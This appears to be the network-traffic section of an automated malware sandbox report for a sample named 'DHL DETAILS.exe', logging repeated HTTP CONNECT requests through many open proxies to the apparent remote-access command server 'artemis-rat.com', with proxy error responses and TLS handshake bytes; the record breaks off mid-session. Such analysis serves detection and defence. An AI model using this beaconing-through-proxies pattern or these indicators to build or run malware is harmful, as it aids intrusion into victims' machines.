                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    43192.168.2.55012943.153.175.434436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.374659061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    44192.168.2.55013343.153.175.434436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.378442049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    45192.168.2.549933184.178.172.5153036352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.389579058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.2.550035172.67.181.32806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.413438082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.567965984 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.2.55002334.49.208.221806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.417814016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.2.54991345.138.87.23810806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.433795929 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    49192.168.2.550058104.19.85.214806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.439496040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.593945980 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    50192.168.2.54995418.134.236.23131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.448456049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.612380028 CET65INHTTP/1.1 200 Connection Established
                                                                                    Content-Type: text/plain


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    51192.168.2.54995795.164.89.12388886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.464622974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    52192.168.2.549979198.105.111.1566936352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.472520113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.003088951 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    53192.168.2.54999635.79.120.24231286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.475512981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.746531010 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    54192.168.2.549965195.90.216.7510806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.476547956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    55192.168.2.54998046.17.63.16690916352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.478713036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.773138046 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    56192.168.2.54994238.54.16.97806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.480993032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.826031923 CET176INHTTP/1.1 404 Not Found
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Length: 19
                                                                                    Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                                                    Data Ascii: 404 page not found


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    57192.168.2.549939111.90.150.10910806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.488037109 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    58192.168.2.550040162.223.94.166806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.497677088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.811845064 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:13 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    59192.168.2.55009643.153.22.29100056352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.514276981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.690388918 CET39INHTTP/1.1 200 Connection established
                                                                                    Mar 9, 2024 13:14:12.690419912 CET160INHTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl
                                                                                    Data Raw:
                                                                                    Data Ascii:


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    60192.168.2.550126104.21.194.19806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.539804935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.694555044 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    61192.168.2.55003418.135.133.116806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.546999931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.854933023 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:12.855460882 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 93 6c 8c 47 68 ce 6e fc 23 7c 4c 6e e9 ba 2d 76 25 86 c4 5c cf 52 f6 6e cc 1d d2 a4 06 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRlGhn#|Ln-v%\Rn*,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:13.148432016 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 8e b2 46 6a 71 8d 54 e5 e4 49 83 ee 2c 2f e3 79 dc 5c 44 73 6a e9 64 df 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9FjqTI,/y\DsjdDOWNGRD0000*H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0*H0_9Q
                                                                                    Mar 9, 2024 13:14:13.162743092 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 a0 13 58 71 2b 9e b3 be 4a 98 0c 20 9b 66 27 7b 73 cc 96 b2 59 43 f7 74 26 50 d5 9e 06 b2 fb 77 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 ee 95 e9 6c 6f f8 02 9a 88 f1 09 42 18 1c b8 d0 05 1d 77 4c da
                                                                                    Data Ascii: %! Xq+J f'{sYCt&Pw(loBwL'&,NF
                                                                                    Mar 9, 2024 13:14:13.452261925 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 b8 14 f4 b7 5e 98 7b 11 b3 d9 24 dc 73 f3 6a 25 94 f1 56 9d 0d 95 97 6b ba 4d 8e 5b 69 85 cd 98 f5 07 f3 1a 37 b1 9b cc
                                                                                    Data Ascii: (^{$sj%VkM[i7


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    62192.168.2.550009159.223.71.71516166352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.547815084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:13.254940033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:14.254961014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    63192.168.2.550160104.16.106.65806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.553560019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:12.707845926 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:12 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    64192.168.2.550015193.239.58.9280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:12.557271957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    65192.168.2.55007524.249.199.1241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
